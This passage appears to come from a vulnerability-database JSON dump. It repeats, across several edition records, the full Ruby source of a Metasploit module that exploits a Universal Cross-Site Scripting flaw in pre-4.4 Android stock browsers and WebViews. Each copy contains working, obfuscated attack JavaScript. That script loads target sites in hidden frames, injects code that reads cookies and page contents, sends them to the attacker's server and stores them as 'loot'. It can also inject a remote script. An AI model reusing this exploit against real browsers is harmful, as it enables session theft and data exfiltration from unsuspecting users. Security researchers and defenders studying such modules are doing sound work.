'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T10:13:15", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T12:10:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T12:10:40"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T12:10:40", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T00:22:54", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-16T00:22:54"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T00:22:54", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T02:24:05", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T02:24:05", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T20:37:58", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T20:37:58", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T22:39:08", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T22:39:08", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T12:36:53", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 